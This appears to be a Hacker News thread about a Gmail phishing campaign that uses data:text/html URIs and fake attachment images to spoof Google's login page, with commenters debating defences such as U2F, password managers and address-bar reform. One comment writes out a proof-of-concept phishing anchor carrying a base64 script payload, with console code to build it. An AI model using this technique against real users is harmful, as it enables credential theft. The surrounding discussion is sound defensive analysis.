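Even without ML magic, a cheap perceptual hash gets you surprisingly far. A sketch (Pillow assumed installed; the threshold is picked arbitrarily):

    from PIL import Image

    def ahash(path):
        # Average hash: shrink to 8x8 grayscale, threshold each pixel on the mean.
        img = Image.open(path).convert("L").resize((8, 8))
        pixels = list(img.getdata())
        avg = sum(pixels) / 64
        bits = 0
        for p in pixels:
            bits = (bits << 1) | (p > avg)
        return bits

    def looks_like(shot_a, shot_b, max_distance=5):
        # Hamming distance between the two 64-bit fingerprints.
        return bin(ahash(shot_a) ^ ahash(shot_b)).count("1") <= max_distance

    # If the rendered page resembles the stored login-page screenshot but the
    # URL differs from the trusted one, warn the user.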

reply

[–] Hello71 link

that won't kill battery life at all

reply

[–] dschep link

A minor change that would help (a little) is to replace all spaces in the address bar with %20.

reply

[–] fsavard link

Or some clearly visible icon at the end of the URL bar saying "2832 more characters ->".

reply

[–] sleepybrett link

Or make the whole bar red and flashing whenever someone uses the tricks this attack uses. Specifically data:text/html and inline script tags.

reply

[–] Ajedi32 link

I mean, they're not wrong, are they? Would this attack have been any less effective if, instead of `data:text/html,https://accounts.google.com/...`, the URL bar said `https://accounts.google.com.login.cz/...`?

reply

[–] xja link

That's a real shame. There are certainly things they could do to prevent images looking quite so similar to UI elements.

reply

[–] willvarfar link

And stop people emailing screen shots?

The best approach I can come up with after five seconds thought is disabling links on non-text elements.

And then they go make an anchor that is whitespace over top of a background image... so we'd also need to disable links on large expanses of empty whitespace in text when it's embedded in a mail.

I should think that can likely be worked around too, however. Got any more ideas?

reply

[–] swiley link

Far better would be to not render HTML emails at all. They're an abomination and have always been causing security problems of different kinds.

reply

[–] sethrin link

> All programs will attempt to expand until they can render HTML emails. Those that cannot will be replaced by those that can.

More seriously, the expectation that emails will consist only of plain text is simply untenable. From a security standpoint this is obviously not ideal, but security and usability are opposed, and if your security scheme does not allow users to send documents with some form of markup, it will not be widely used.

reply

[–] swiley link

Emails had a form of markup before HTML emails came along; it was the inspiration for Markdown.

reply

[–] Mtinie link

For an "ultra security mode" that would work, but it would break a large portion of the Web's sites (as you noted, and it's easy-ish to circumvent) :/

Conceptually I like the idea of an ultra security mode for certain use cases, but ultimately it ends up making the whole web look like a bunch of plain text emails -- no JS, probably no images (unless they are somehow sandboxed and displayed from a safe local store), links are fully visible, etc.

reply

[–] xja link

I was thinking more of a specific mail scanning process for images that look exactly like UI elements, with some fuzzy match.

If it matches, flag it with the usual warnings.

It feels like there's at least the potential to explore options.

reply

[–] das_keyboard link

Why not just put a little frame around embedded elements like pictures, etc? Maybe with a little icon indicating the type.

reply

[–] laumars link

That would break more legitimate HTML e-mails than the phishing it's aiming to catch. You might argue that it's worth the breakage but that would be a harder argument to sell to businesses.

Pragmatically I think browsers disabling the rendering of data:text/html is a better approach. The breakage is minimal and it would catch more phishing attacks than just the ones that originated from emails with embedded images.

reply

[–] pavel_lishin link

According to our numbers, plain emails actually perform better than HTML emails when it comes to business mailings.

reply

[–] laumars link

That's good to read, but sadly that's a different point to the one I was making. Google would break a lot of legitimate emails if they made the changes to GMail that the GP was proposing. This would be an unattractive solution to Google, as they would effectively be breaking their "mail client" (in the broader sense of the term) relative to their competitors, while the benefits are limited to a specific type of phishing attack. So when Google weighs up the risk of annoying their customer base vs securing them, this particular fix is unlikely to score high enough in the latter category to be worth the risk to the former.

reply

[–] jcranmer link

Break the image into several layers and use transparency for the non-included bits. Or you could go full Acid2-like crazy CSS to generate the image from multiple, apparently innocuous elements.

reply

[–] undefined link
[deleted]

reply

[–] tdkl link

Yeah, more people need to get scammed, then the media will advertise how it happened and how to prevent it. It's called learning and is a sign of maturity.

reply

[–] xja link

To be frank I think that's a bit naive.

These attacks are a numbers game. There's a low cost to sending the emails and a much larger payoff.

Education helps, but it's still possible to catch people off guard, tired, new users etc.

Anything that can be done to flag these emails as spam, or increase the cost to the attacker helps.

reply

[–] gearhart link

Whilst I agree with you that the issue should be addressed by mail clients, these emails are not a numbers game in quite the same way as usual spam.

Since they rely on attachments and subject lines that are drawn from an individual user's gmail account, they have to propagate through a network, and they can't be just mass-emailed. Anything that can get the ratio of people falling for this lower than 1/<avg addressbook size> will completely eliminate the issue.

reply

[–] undefined link
[deleted]

reply

[–] timruffles link

I reported this back in March 2016, and Google said it was not an issue.

Analysed the whole attack here: https://gist.github.com/timruffles/5c76d2b61c88188e77f6

This was the response I got:

> The address bar remains one of the few trusted UI components of the browsers and is the only one that can be relied upon as to what origin are the users currently visiting. If the users pay no attention to the address bar, phishing and spoofing attack are - obviously - trivial. Unfortunately that's how the web works, and any fix that would to try to e.g. detect phishing pages based on their look would be easily bypassable in hundreds of ways. The data: URL part here is not that important as you could have a phishing on any http[s] page just as well.

reply

[–] ericleung link

The scariest part is that you knew that there was something suspicious and still [almost] got phished. There's no reason to believe anyone (technical or not) that wasn't looking out for something suspicious would have possibly avoided the attack.

Pretty nasty phishing attempt, way more subtle than past attacks.

reply

[–] scandox link

Had the same exact experience in August.

Amazing thing was I KNEW the email was phishing. I was asked to look at it by someone internally who was suspicious. I forwarded it to a Gmail account I use for dodgy items. I fired up a VM and logged in to the Gmail account. I looked at the email. I briefly examined the raw message (too briefly). Then I clicked on what I still thought was a Google Drive attachment.

My first thought was "oh I've been logged out of Gmail for some reason". I was just about to login again when I decided to double check the URL and finally saw what was going on.

I think most normal users would be very vulnerable to this. It's very subtle. Luckily the guy in accounts is paranoid.

reply

[–] cyberferret link

Yes - I am vigilant to almost a paranoid level, but one day a phishing email came from "Australia Post" purporting to be a missed delivery notification on a day that I was expecting a delivery and thought I had missed the driver.

I was in a hurry, and frustrated and was a millisecond away from clicking the link when some gut feeling told me that something was not right. Closest I've come to date, and it worried me.

EDIT: Sorry, I meant to respond to @soneca below, as this relates to phishing emails arriving with impeccable timing...

reply

[–] soneca link

And then that phishing email with the right theme and message arrives with a perfect timing, when you were just expecting an email like that. It happens.

reply

[–] sixothree link

This describes my experience many years ago. I woke up early and groggily read through my emails. One of them was an angry message from an eBay buyer about a package not having arrived on time. I clicked and logged in and got an error message. Examining the email, it was certainly phishing. Changed my password immediately.

I believe this may have been before eBay took phishing seriously by including your real name in the emails, etc.

reply

[–] frogfuzion link

I think it's naive to believe that even the most tech savvy are immune to phishing. People get tired, hurried, stressed - and during those moments anyone's guard can be let down.

reply

[–] caleblloyd link

Password managers really shine at times like these. It's especially helpful when using complicated auto-generated passwords. That way you don't readily "know" your password, so the first thing you do is look to autofill.

It's still a good idea to have an analog backup of really important passwords. Like if you use Gmail and it is the password reset email for everything else, print out the generated password and put it somewhere safe. Just in case your password manager becomes insolvent one day.

reply

[–] unholiness link

> Password managers really shine at times like these

I agree on some levels, but password managers can and have had vulnerabilities[0] that can allow the gmail password to be populated despite the wrong domain. Given that the autofill adds legitimacy and reduces friction, it could make this particular scenario go from bad to worse.

[0] https://labs.detectify.com/2016/07/27/how-i-made-lastpass-gi...

reply

[–] chki link

I would argue that it is probably a good idea to print out all your passwords every month or so as there is not much risk attached to it (thieves do not usually look for these things).

reply

[–] mike-cardwell link

"I don't have images loaded by default for unknown senders"

Does this just prevent the display of images which require fetching from a remote URL, or does it also include images which are embedded in the email as attachments?

reply

[–] hobarrera link

Aside from the fact that this was not an external image, it was also emailed to him by a friend.

reply

[–] Tepix link

It does not prevent this if the image is attached to the mail.

reply

[–] eridius link

An even more common way of making it load without causing the email to look like it has an attachment is to embed the image as a data: URI in an <img> tag. Since it's not remote, it will be loaded, but since it's not an attachment, your email client won't show it in the attachments list.

reply

[–] Jarwain link

Assuming the attack is the same as what jhardcastle experienced, the email is propagated by sending emails to those who have received emails from the victim before. In other words, it would be a known sender sending you that email.

reply

[–] TillE link

Right, I almost never manually enter passwords on the web. If LastPass isn't automatically filling the field, something is very wrong.

It's a nice extra security check, in addition to the primary benefits of using a password manager.

reply

[–] murkle link

The Twitter thread says the image is embedded, so I guess it will still show?

reply

[–] Ajedi32 link

In my case, I likely would have noticed that:

1. The download link didn't show any hover effect when I moused over it

2. Google is asking me to sign in even though I was obviously already authenticated

3. Even if at this point I didn't think to glance at the URL bar and actually entered my password into the phishing page, U2F would save me from being fully compromised

reply

[–] pasta link

This is the reason why I convert all incoming mail to plain text. It has saved me from trackers and phishers so many times.

reply

[–] slazaro link

The only two things that I think could have prevented me from falling for this are: I don't have images loaded by default for unknown senders, and LastPass wouldn't match the domain and therefore wouldn't show the button to autocomplete on the password box.

Depending on how observant I'd be at the moment, I might check the URL bar and see something fishy. But I could fall for this, which is worrying.

reply

[–] dvh link

    <a href="data:text/html,valid_looking_url    <script src=data:text/html;base64,YWxlcnQoMTIzKQ==></script>">clickme</a>
Or if you want to reproduce it in the console:

    // Build the same malicious anchor from the console.
    a = document.createElement('a');
    // The data: URI starts with text that looks like a URL, followed by a
    // script tag whose base64 payload decodes to alert(123).
    a.href = 'data:text/html,valid_looking_url    <script src=data:text/html;base64,YWxlcnQoMTIzKQ==></script>';
    a.textContent = 'clickme';
    a.style.position = 'fixed';  // pin the link to the top-left corner
    a.style.left = 0;
    a.style.top = 0;
    a.style.zIndex = 9999;       // keep it above the page content
    document.body.appendChild(a);
The "valid_looking_url" will appear in document but it can be hidden from page by script or made transparent using css

reply

[–] mike_hearn link

It's a hard problem but the industry isn't doing as much as it could do. There's low hanging fruit that has gone unharvested for years at most big companies.

1. Reform the browser address bar. Safari does this right. Chrome, IMHO shamefully, does not. The address bar is completely ignored by a large fraction (I've read it's about 25%) of users because it's full of meaningless technobabble. These users navigate entirely by sight. Weak sauce changes like making some of it light grey instead of black make no difference. The usability nuclear holocaust that is the browser address bar is in my view THE leading cause of phishing because it's rendered users unable to identify who they are talking to when they submit data via the web. The address bar should show the domain name only, or the EV identity when that's present, and the browser industry should adopt practices to push usage of EV SSL everywhere. Only EV SSL is a feasible approach to get the actual, legal, verified identity of a server operator on the user's screen in a reliable and scalable way.

2. The big networks need to lead by example and adopt EV SSL, see above.

3. Kill re-authentications dead. Google was talking about this internally around the time I was working on the account system there, but I don't recall if they ever did it. For as long as web sites routinely ask users to re-authenticate at seemingly random times users will type their password into any page that looks right without thinking. Only by making authentication a very rare event can you start to convince users to take more care over checking the site origin. I think Facebook has got this right: I don't think I'm ever asked to sign in to Facebook unless I'm using a new device, but lots of websites don't.

4. Teach UI/UX designers about the dangers of designing user interfaces where attacker controlled content isn't strongly visually separated from system controlled content. In this era of personalisation and theming there's really no reason why things like the Gmail attachment icon need to be placed right next to the content of an email with the same generic white background as attacker controlled content. Give it a semi-transparent background and set users up with a wallpaper-esque theme by default and it gets a lot harder to put things in a message that look like UI widgets.

reply

[–] thomasahle link

> 1. Reform the browser address bar. Safari does this right. Chrome, IMHO shamefully, does not. ... The address bar should show the domain name only, or the EV identity when that's present,

Chrome on Android does this. And it's extremely annoying. Since mobile browsers (and desktop browsers with tabs) usually don't show the title of pages, the address bar is the only place to tell e.g. what Wikipedia page you're currently reading.

You are probably correct, that it's a win for security, but I wish it could be turned off.

reply

[–] gcp link

We tried this in Firefox for Android and user outcry was so bad it had to be turned off almost immediately.

There are some tricks now to make sure the domain is visible and highlighted, but IMHO not enough to be safe, especially with the address bar scrolling off screen on phones.

reply

[–] mike_hearn link

Wikipedia pages have the title at the top of the page.

In practice, the sort of users who complain about such things are in my experience the sort who also have dozens of tabs open, which smushes the title down to just a few characters. Heck even when there's space in the tab bar Chrome won't allocate more than a few cm of space on screen to showing the title. HTML titles are pretty much a dying thing anyway, so given the ongoing pain caused by phishing I wouldn't hesitate to pull the plug on them.

reply

[–] thomasahle link

On mobile, scrolling to the top of a Wikipedia page can be 20 screens or more. After that it's a lot of work getting back to where you were. Many news sites are similar.

reply

[–] eridius link

You could just pop open the tab view, so you can see the page title.

reply

[–] fornever link

I'll admit the situation would get slightly better, but all these incremental fixes don't deal with the real problem, which is that authentication is treated no differently from any other data. If authentication were treated differently you could quite easily...

1. Distinguish clearly between authenticating to the correct server and entering form data.

2. Not send the actual password to the server but instead use some form of challenge-response.

3. Store the authentication token securely i.e. not as a cookie.

4. Enable other forms of authentication e.g. with keys.

5. Decrease the use of passwords overall (though better password authentication would still be a win).

This would make it much harder to perform a range of attacks, from phishing to session hijacking. It would also potentially increase privacy, since you could more easily disable things like tracking. The reason you don't see the improvements you mention is, to some extent, because the engineers in question would have to reconcile themselves with the idea that they are the ones responsible. It's much easier to hold the position that it's other entities, or users, that don't understand how things work.

reply

[–] sly010 link

> 3. Kill re-authentications dead.

Then I would forget my password, like I always forget my GitHub password and have to reset it every leap year when I log out for some reason, but I guess that's a small price to pay.

reply

[–] jungletek link

Password Safe is a (Bruce Schneier recommended) alternative. Free, runs locally. I'm a big fan.

https://pwsafe.org/

reply

[–] uwu link

you should invest in a password manager (I use KeePass)

reply

[–] sly010 link

I have. I've been using 1Password for about a year now. But I haven't logged out of (hence logged in to) GitHub since I installed it, and as a result it (1Password) doesn't know my GitHub password. And frankly nor do I. So my point is valid, at least until the next time I have to re-login.

Case in point: I also use Authy with backup, but I don't store my backup password in the password manager, because that would be a potential single point of security failure. The app kindly asks for a backup password occasionally. It's not for access, but for reminder. In fact if I don't remember my password, I can reset it right there in the app. I find that feature very useful.

reply

[–] Groxx link

I'll toss on 5: iframes are the devil. Incredibly useful, obviously, but they also teach users to e.g. type their payment-widget password into any domain, just because it appears after clicking a correct-looking button. Iframes don't have a visible URL, or even a border, so there's no way for users to know that the widget isn't from this site, even if some other technique successfully made them aware of what site they were on.

reply

[–] marcosdumay link

#0 - Get browsers to agree on some protocol for client-side certs, and make them usable. That obviates the need for #s 1, 2, 3, or 4.
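
The TLS layer already supports this, for what it's worth; the missing piece is agreement and UX, not mechanism. A minimal sketch with Python's ssl module (the cert and key file names are hypothetical, provisioned per user):

    import socket, ssl

    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
    # The client certificate and private key would be provisioned per user.
    ctx.load_cert_chain(certfile="me.crt", keyfile="me.key")

    with socket.create_connection(("example.com", 443)) as sock:
        # If the server requests a client cert, the handshake itself proves
        # key possession -- no secret is ever typed into a page.
        with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
            print(tls.version())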

reply

[–] mike_hearn link

Make key management as user friendly as passwords and I'll agree. I don't think it's going to happen any time soon.

reply

[–] lol768 link

> The address bar should show the domain name only, or the EV identity when that's present, and the browser industry should adopt practices to push usage of EV SSL everywhere. Only EV SSL is a feasible approach to get the actual, legal, verified identity of a server operator on the user's screen in a reliable and scalable way.

EV certs have their place, but I'm not sure they're better than a URL that you're familiar with. For example, Natwest uses an EV cert which displays as "The Royal Bank Of Scotland Group Plc" because it's part of a larger group, but the actual legal name of the firm is "National Westminster Bank Plc".

Additionally, what happens when we get companies in different sectors with similar names? If there were an "RBS Applications Ltd" whose EV cert was later compromised and used for phishing, I wouldn't suspect it was wrong.

> Kill re-authentications dead. Google was talking about this internally around the time I was working on the account system there, but I don't recall if they ever did it. For as long as web sites routinely ask users to re-authenticate at seemingly random times users will type their password into any page that looks right without thinking. Only by making authentication a very rare event can you start to convince users to take more care over checking the site origin. I think Facebook has got this right: I don't think I'm ever asked to sign in to Facebook unless I'm using a new device, but lots of websites don't.

And what do we do about the problem of users leaving their computers open and exposed for short periods? I like GitHub's sudo feature; it helps ensure that sensitive actions (adding SSH keys, adding access tokens, etc.) require a confirmation.

An alternative could be to require a 2FA-only confirmation rather than a password check.

> Teach UI/UX designers about the dangers of designing user interfaces where attacker controlled content isn't strongly visually separated from system controlled content. In this era of personalisation and theming there's really no reason why things like the Gmail attachment icon needs to be placed right next to the content of an email with the same generic white background as attacker controlled content. Give it a semi-transparent background and set users up with a wallpaper-esque theme by default and it gets a lot harder to put things in a message that look like UI widgets.

Completely agreed on this. The rollover animations and other features that seem to be declining in use with the advent of flat design are also a great help here, because you can't achieve that sort of interactivity with an image.

Worth noting that I suspect there would've been some tells anyway with this sort of attack. The cursor would've been wrong over the entire image (a hand cursor everywhere, not just over the button) and any subtle click animations wouldn't have worked.

reply

[–] mike_hearn link

If the legal name is National Westminster Bank Plc they should be able to get an EV cert under that name. Perhaps they just haven't bothered to do so?

The point of an EV cert is only half to give users meaningful names. The other half is that there's a meaningful level of verification done on the ownership of the name. If you're creating fake companies for the purposes of getting phishy EV cert names, it should be a lot easier to track down who you are. The standards around them are much more carefully spelled out than for DV certs.

Leaving your computer exposed is what lock screens are for.

reply

[–] mikeash link

One problem with relying on familiar URLs is lookalike URLs that only appear to be the ones you know. Would you notice that you're visiting natwеst.com instead of natwest.com?
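
The difference is invisible to the eye but not to the machine; a quick check in Python (the first name really does use a Cyrillic letter):

    >>> "natwеst.com" == "natwest.com"
    False
    >>> import unicodedata
    >>> unicodedata.name("е")
    'CYRILLIC SMALL LETTER IE'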

reply

[–] mathattack link

I think the move has to be from "Keeping your system from being compromised" to "Detecting the compromise after it's happened".

reply

[–] xmodem link

Thanks for sharing this - this is fiendishly clever. Even with all the investment in infosec, we're still woefully unprepared to deal with this type of attack. We need to start thinking about new approaches to protect users.

reply

[–] SamBam link

It sounds like the attackers got in almost instantly -- presumably they logged in via script, not a human. Changing your password at that point would probably be like closing the stable door after the horse has bolted.

Still useful, I guess, because it lets you know immediately what's up, so you can send out emergency emails to your contacts.

reply

[–] sly010 link

The plugin actually alerts you the moment you press down the last key on your keyboard, before you could even press enter, so you don't even get a chance to submit the password.

But even if you assume that at that moment the attacker has your password... I have seen Gmail takeovers live, and Google's authentication system allows you to recover an account even after it has been taken over, as long as you still have the old methods of authentication and you are within an unspecified timeframe.

Of course you will have to spend the day cleaning up your email filters and apologizing to all your contacts, but at least you will have your account back.

reply

[–] sly010 link

There is also a password alert chrome plugin by google [0].

If you ever enter your Google password on any domain other than accounts.google.com, it will immediately alert you and give you a link to change your password. It can handle multiple passwords too, if you have multiple Google accounts.

[0] https://chrome.google.com/webstore/detail/password-alert/noo...
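
The general idea behind such a tool is simple enough to sketch; this is illustrative only, not how Google's extension is actually implemented:

    import hashlib

    SALT = b"random-per-install-salt"
    # Store only a salted hash of the password, never the password itself.
    STORED = hashlib.scrypt(b"hunter2", salt=SALT, n=2**14, r=8, p=1)

    def on_keystroke(typed_so_far, password_length=7):
        # Compare the tail of the keystroke buffer against the stored hash
        # on every keypress, so the alert fires before the form is submitted.
        tail = typed_so_far[-password_length:].encode()
        if hashlib.scrypt(tail, salt=SALT, n=2**14, r=8, p=1) == STORED:
            print("Warning: you just typed your password on an unknown domain")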

reply

[–] blauditore link

As a side note, it looks like this couldn't have happened with an external mail reader like Thunderbird. Even if the attack were targeted at such a client and mocked up some other UI element, clicking the link would open a browser window and reveal the fraud, at least to power users.

I'm not advocating against web-based mail readers, simply because it's not always possible or practical to use external ones. But it seems security is harder to implement because everything is "made of the same parts", i.e. a web-based mail displayed in a web-based application, opening links in the same (browser) window.

reply

[–] jhardcastle link

They aren't using popular attachments. They are using customized attachments from the actual compromised sender. I commented elsewhere in the thread, but once they gain your credentials, they will go into your account to get one of your attachments, and then email a screenshot of that to your contacts, some of whom may have already seen that attachment.

reply

[–] pcl link

Sure, but the chrome around the image is still "trusted attachment" chrome.

I get that the browser people will say only their chrome is trusted, but when someone is using your app, your app's internal UI affordances receive that same level of trust in your users' minds.

reply

[–] gushie link

I'm surprised that, with Google's image detection technology, Gmail doesn't do image recognition on images with links where the image looks like a popular document attachment, and send them to spam. Or perhaps they do, but the phishers are able to evade it.

reply

[–] rerx link

Once I almost fell for an extremely well-made PayPal phishing mail. It was late at night and I had just made a purchase via PayPal at a very small web shop. The timing was so perfect to catch me off guard that I am certain that site had been broken into to gather my email address.

reply

[–] kinkrtyavimoodh link

What do you do for "Sign in with your Google Account" situations?

reply

[–] qntty link

I personally never sign in with a Google (or any other) account; I always sign up for new accounts with my email.

reply

[–] vilhelm_s link

Shouldn't this still work? I think if you are signed in to Gmail, then when a third-party site asks you to log in, it pops up a window with just a button saying "authorize"; you should not be asked to enter your password again...

reply

[–] undefined link
[deleted]

reply

[–] ronnier link

I don't. I don't sign in with my gmail anywhere. It has the keys to my kingdom, so I treat it with special care.

reply

[–] undefined link
[deleted]

reply

[–] ronnier link

My rule for Gmail... I type gmail.com then log in. That's the only path I take to log in. I never click a link and log in, etc. Really, I do this for most sites I use.

reply

[–] rovek link

I'd be really interested to see the increased success rate. Even if the most tech-savvy weren't fooled (I'm not so sure), I would be surprised not to see a vast increase over your average misspelled ecommerce phishing email. Shame those crooks don't practise open data.

reply

[–] jfoldager link

That is very well done. I only see people suggesting 2-factor auth as a remedy, but I guess any password manager would work as well. You wouldn't even get to the point of compromising your password.

I use 1password, which will only fill in the password associated with the current domain.
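
That per-domain lookup is the whole defence, and it's worth spelling out. A toy sketch of why a lookalike site gets nothing filled in (vault contents invented for illustration):

    # Credentials are keyed by exact origin, so a lookalike domain simply
    # has no entry and nothing gets filled in.
    vault = {"https://accounts.google.com": ("alice@gmail.com", "s3cret")}

    def autofill(origin):
        return vault.get(origin)

    print(autofill("https://accounts.google.com"))          # fills
    print(autofill("https://accounts.google.com.evil.cz"))  # None: red flag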

reply

[–] jpl56 link

Yes! They do it for banknotes (it's impossible to scan or xerox them). They could do it in the same way for login pages!

reply

[–] new299 link

I guess it's an arms race, but I would guess there are a few potential ways to mitigate against this:

1. Watermark all images in the in-email preview.

2. You should be able to design a mail scanner which would detect images that look too much like Gmail elements and flag them (a toy sketch below).
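
A toy version of idea 2, using a perceptual average-hash. Crude, but it shows the shape of the approach; the reference image name is hypothetical:

    from PIL import Image

    def ahash(path, size=8):
        # Downscale to 8x8 greyscale and threshold against the mean.
        img = Image.open(path).convert("L").resize((size, size))
        pixels = list(img.getdata())
        avg = sum(pixels) / len(pixels)
        return sum(1 << i for i, p in enumerate(pixels) if p > avg)

    def looks_like_gmail_ui(candidate, reference="attachment_chrome.png", threshold=6):
        # Small Hamming distance between hashes means "visually similar".
        distance = bin(ahash(candidate) ^ ahash(reference)).count("1")
        return distance <= threshold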

reply

[–] twostoned link

I have been reading the comments wondering if this was a specific Gmail webmail thing. I'm guessing that using IMAP or POP3 through an email client would make this harder? I'm by no means without risk, but I rarely use the Gmail web client, so I wasn't sure exactly what the scam was.

reply

[–] zbuf link

The problem here is monopoly, or monoculture.

The whole world is, basically, using one email client. The lack of diversity means a well written scam like this spreads easily.

I can say for certain I'd never fall for this scam -- because it looks like crap in Pine. I know I'm special, but the same applies to Thunderbird, or whatever.

There's probably a parallel to biology here. Let's get diversity back in our internet culture and, with it, resistance; scams like this will be less convincing and much less likely to spread. Hopefully removing some of the incentive, too.

reply

[–] camus2 link

> The problem doesn't get better until we destigmatize it.

Absolutely, it can happen to anyone. I'm sick of people here or on other forums who do some victim blaming, calling phishing victims "idiots". It's not going to solve the problem. And often the Gmail or Chrome teams dismiss these kinds of issues.

I had to revert to the HTML version of Gmail and disable images in the client because I was sick of all the phishing attempts.

reply

[–] jmbmxer link

As a security professional, I'm wired to loathe shortened links. This is a great example and exactly why I created a little hobby Chrome extension to expand all shortened links for inspection - https://unshorten.link
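
For anyone who wants the effect without an extension, the core of link expansion is just following the redirect chain server-side. A sketch (not necessarily how unshorten.link itself works; the short link below is hypothetical):

    import requests

    def unshorten(url):
        # A HEAD request follows the Location chain without fetching bodies,
        # so you can inspect the final destination before visiting it.
        resp = requests.head(url, allow_redirects=True, timeout=5)
        return resp.url

    print(unshorten("https://bit.ly/example"))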

reply

[–] mike-cardwell link

Depends on the type of 2FA. If it's using U2F, then you'd be fine as that is tied to the domain name of the site you're on, but if it's using TOTP/HOTP (i.e. Google Authenticator), and the phishing site asked you for your 2FA code, and you gave it, then you would still be successfully phished.
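
To see why TOTP is relayable, here's the whole algorithm (RFC 6238) in a few lines; note that nothing in it involves the site you're typing the code into, which is exactly the property phishers exploit:

    import hashlib, hmac, struct, time

    def totp(secret, step=30, digits=6):
        # The code depends only on the shared secret and the clock, so
        # anyone who sees the six digits can replay them for the rest of
        # the 30-second window.
        counter = int(time.time() // step)
        mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
        offset = mac[-1] & 0x0F
        code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)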

reply

[–] thomasahle link

Is the difference here that TOTP/HOTP is entered by the user, while U2F is entered automatically?

reply

[–] mike-cardwell link

Yes. With U2F the recipient of the token is verified by a machine. With TOTP/HOTP it is verified by the user looking at the browser address bar.

reply

[–] Niten link

Not entirely. The important difference is that instead of generating a secret on the token and passing it to the server, U2F has the token sign a challenge issued by the server, using a per-domain private key whose public counterpart was stored by the server at token registration time.

The corresponding private key is stored on the token indexed in part by the requesting domain, which is supplied by the browser during an auth request. It is because of browser participation that a MITM domain would not be able to ask the token to answer the challenge with the correct key handle.

The actual implementation can differ from what's described above, see Yubico's description of their key wrapping scheme if you want more detail:

https://www.yubico.com/2014/11/yubicos-u2f-key-wrapping/
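
In rough pseudocode, the server-side check looks something like this (field names simplified; see the FIDO specs for the real encoding):

    import json

    def check_signature(pubkey, data, sig):
        ...  # ECDSA P-256 verification over the client data, elided here

    def verify_assertion(client_data_json, signature, registered_pubkey,
                         expected_origin, issued_challenge):
        client_data = json.loads(client_data_json)
        # The browser, not the page, writes the origin into the client data,
        # so a MITM phishing domain cannot claim to be accounts.google.com.
        if client_data["origin"] != expected_origin:
            return False
        if client_data["challenge"] != issued_challenge:
            return False  # stale or replayed challenge
        # Finally check the token's signature with the public key stored
        # at registration time.
        return check_signature(registered_pubkey, client_data_json, signature)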

reply

[–] danieldk link

Besides what mike-cardwell says, TOTP relies on a shared secret, while U2F uses challenge response authentication. Even if a MITM captures the (encrypted) challenge-response sequence, a new authentication requires a new challenge-response.

reply

[–] dividuum link

Not necessarily. It depends on how sophisticated the attack implementation is. They are MITM'ing you at that point, so it's entirely possible to capture not only username/password but also the 2FA token.

reply

[–] crashdown link

Surely it must. The attackers would have your email and password but wouldn't be able to log in?

reply

[–] slig link

What is stopping them from showing the TFA screen and asking you to type in the number?

reply

[–] JorgeGT link

Well, Google TFA doesn't ask you to type your number (and others ask for only some digits), so it probably would raise a red flag big enough to wake you from auto-pilot, I hope.

reply

[–] mike-cardwell link

I assume you're using the type of 2FA where this is not the case. We are discussing the type of 2FA where Google does ask you to enter your number, i.e. TOTP. When I log into Google, it asks me to type my 2FA number in.

reply

[–] JorgeGT link

Ah, I didn't know Google offered TOTP. I only had the option of mobile phone SMS 2FA.

reply

[–] volent link

Yes

reply

[–] hvidgaard link

Yes. That is the point of 2FA. Require something more than login credentials, preferably something physical you possess, for an actual login to be successful.

reply

[–] spydum link

Incorrect: U2F would prevent this, but a simple 2FA challenge could just be displayed on the next screen of the form, and once you submit, the malicious server could immediately use the token you provide. U2F does mutual auth of the U2F service, so it should fail.

reply

[–] hvidgaard link

U2F prevents MITM attacks, which this is an instance of. Using Google's standard 2FA with the machine/browser remembered for 30 days, it would pop up and say you need your 2FA, which would be suspicious. With U2F it would say the service is unknown, which is equally suspicious. But my point was simply that 2FA prevents the attack when the attacker has only the login information, not that the attack can't be further refined to capture your 2FA token as well.

2FA is a great prompt to look at all the data and decide whether or not to hand over the token. For instance, I always double-check the URL when I'm about to enter a 2FA code.

reply

[–] _wdh link

That's scary. Would having 2FA enabled on your Gmail account protect you from this kind of attack?

reply

[–] eridius link

What's the point of that one? Just hoping that the user selects the same security questions and/or password as their google account?

reply

[–] martin-adams link

I nearly fell for this attack; what saved me was that my email address wasn't autofilled on the fake Google login. That made me look at the URL, and my ultrawide monitor revealed a cunning URL that had some whitespace padding to hide the real URL.

reply

[–] martin-adams link

You can create application specific passwords, but I don't know if you can log in to the master account with those.

But you can generate backup codes that you can print out or store somewhere safe for that emergency.

reply

[–] greenspot link

Always smiled at phishing scams, but this scares the hell out of me, so I just headed to Google to set up 2-factor authentication.

How is your experience?

I understood that I can register specific machines not to use 2-factor, so if I lose my phone I can still log in. Anything else to consider?

reply

[–] tantalor link

I was about to ask why browsers don't prompt for confirmation when submitting a password on an unfamiliar domain, but then I realized the fake login page would just use a normal text field instead of a password field and fake the password dots.

reply

[–] swalsh link

I think it's time for Google to implement the personalized icon thing banks have when logging in. I definitely classify my email as nearly as important, security-wise, as my banking information.

reply

[–] mike-cardwell link

You mean, if the phishers sent text email instead of HTML email, would they be less successful? Probably. So why would they?

Are you suggesting that all email/webmail clients stop rendering HTML?

reply

[–] tehabe link

I'm suggesting that companies like Google should have a plain-text option.

The long-term goal would be to get rid of HTML, at least in my utopian mind; in reality it will never happen.

reply

[–] tehabe link

I wonder if the usage of plain-text mails would reduce phishing or increase it?

reply

[–] roywiggins link

It's not Javascript, it's a data URI that renders an HTML page.

reply

[–] _nalply link

which contains JavaScript

reply

[–] lenkite link

IMHO JavaScript should never have been allowed in the address bar, or even inline in an href. The first time I learned about this feature of a browser, I was thinking "security defect".

reply

[–] espadrine link

1Password is great, but it solves a problem that we should get rid of.

It converts the n-websites-n-passwords situation into one where passwords become random tokens unlocked by a single client-side secret.

We need to make U2F more widespread.

reply

[–] mikeash link

This is a lesser-known benefit of password managers that autofill (or at least auto-look-up) passwords in web pages. I might fail to notice a wonky address bar, but 1Password will notice.

reply

[–] TeMPOraL link

> Why would you need to sign in if you're already in your gmail? Not to say there's anything obviously wrong, one could easily go there.

I can't tell you why, but I'm pretty sure it happens - I have a recollection of having to reauthenticate every few weeks or so when opening a Google Drive attachment from my Inbox window. So I would not be surprised if I saw a login screen after clicking on such an "attachment".

reply

[–] artofcode link

Session timeout? I believe mail hosted by Google/Gmail for companies can have rules set up so that logins are invalidated after some time. I have this with my company e-mail, for example. One would be even more easily tricked if that's the case.

reply

[–] wakkaflokka link

I know that when using some services from Google, like Google Takeout, it asks you to authenticate regardless of whether you are already logged in or not.

reply

[–] phkahler link

Why would you need to sign in if you're already in your gmail? Not to say there's anything obviously wrong, one could easily go there.

